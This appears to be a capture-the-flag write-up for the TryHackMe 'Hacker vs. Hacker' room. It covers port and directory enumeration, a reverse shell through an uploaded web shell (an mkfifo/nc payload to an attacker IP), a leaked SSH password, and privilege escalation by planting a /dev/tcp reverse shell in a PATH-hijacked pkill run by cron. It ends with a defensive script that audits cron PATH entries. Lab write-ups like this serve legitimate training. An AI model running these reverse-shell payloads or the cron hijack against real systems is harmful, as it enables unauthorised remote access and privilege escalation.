Hacker vs. Hacker
Room Link: https://tryhackme.com/room/hackervshacker
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt


Kali
ffuf -u http://$VICTIM/cvs/FUZZ.pdf.php -w /usr/share/wfuzz/wordlist/general/common.txt



Kali
nc -lvnp 1337
Started using Burp while testing out payloads, to URL-encode payloads more easily.
Burp
GET /cvs/shell.pdf.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.9.104+1337+>/tmp/f HTTP/1.1
Host: 10.10.21.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



I got the password for lachlan, but it kept kicking me out.
Kali
ssh lachlan@$VICTIM
Password: thisistheway123

There is a cron job that keeps killing our shell. Reading /etc/cron.d/persistence shows why it is also the way in: the job sets a PATH with /home/lachlan/bin ahead of /bin and /usr/bin and calls pkill by bare name, so a script named pkill in lachlan's bin directory is what the job actually runs. A reverse shell planted there is executed with whatever privileges the cron job runs under. Substitute the attacker IP for $KALI in the command below, since the victim shell does not have that variable set, and use the full path in the chmod so it does not depend on the current directory.
Victim(www-data)
cat /etc/cron.d/persistence

Victim(lachlan)
echo "bash -c 'bash -i >& /dev/tcp/$KALI/1338 0>&1'" > /home/lachlan/bin/pkill ; chmod +x /home/lachlan/bin/pkill
Kali
nc -lvnp 1338
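A check for the PATH hijack, added here and not part of the original writeup: it pulls the PATH= line out of a cron file, lists which of those directories the current user can write to, and resolves which file a bare command name such as pkill would actually run, in the same left-to-right order cron uses. demo_hijack builds a constructed cron file in a scratch directory (modelled on the layout described above, not the room's real /etc/cron.d/persistence; the "root" user field is only there because cron.d syntax requires one) and plants a fake pkill to show the lookup landing on it.

```shell
#!/bin/sh
# Added example: audit a cron.d file for a PATH hijack. Not part of the original
# writeup; the cron file used by demo_hijack is constructed, not the room's.

# Print the value of the first PATH= line in a cron file (quotes stripped).
cron_path() {
  sed -n 's/^[[:space:]]*PATH=//p' "$1" | head -n 1 | tr -d '"'
}

# List the PATH directories the current user can write to, in lookup order.
# Any directory listed here can shadow binaries in the directories after it.
writable_cron_path_dirs() (
  IFS=:
  for d in $(cron_path "$1"); do
    [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
  done
  return 0
)

# Resolve a bare command name ($2) the way the cron job would: the first
# executable regular file found walking the cron file's PATH left to right.
resolve_under_cron_path() (
  IFS=:
  for d in $(cron_path "$1"); do
    if [ -f "$d/$2" ] && [ -x "$d/$2" ]; then
      printf '%s\n' "$d/$2"
      return 0
    fi
  done
  return 1
)

# Self-contained demo: a constructed cron file whose PATH starts with a
# user-writable bin directory, and a planted "pkill" in it. Exits 0 when the
# planted file is what resolves and that directory is the first writable one.
demo_hijack() {
  tmp=$(mktemp -d) || return 2
  bin="$tmp/home/lachlan/bin"
  mkdir -p "$bin"
  # Constructed file; "root" is only cron.d syntax here, not a claim about the room.
  printf 'PATH=%s:/bin:/usr/bin\n* * * * * root pkill -f something\n' "$bin" > "$tmp/persistence"
  printf '#!/bin/sh\necho planted\n' > "$bin/pkill"
  chmod +x "$bin/pkill"
  resolved=$(resolve_under_cron_path "$tmp/persistence" pkill)
  first_writable=$(writable_cron_path_dirs "$tmp/persistence" | head -n 1)
  rm -rf "$tmp"
  [ "$resolved" = "$bin/pkill" ] && [ "$first_writable" = "$bin" ]
}

# On the box:
#   writable_cron_path_dirs /etc/cron.d/persistence
#   resolve_under_cron_path /etc/cron.d/persistence pkill
```

The defensive reading of the same check is the fix: a cron PATH must not contain a directory writable by a less privileged user, and commands in cron entries should be given by absolute path so the lookup never happens at all.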
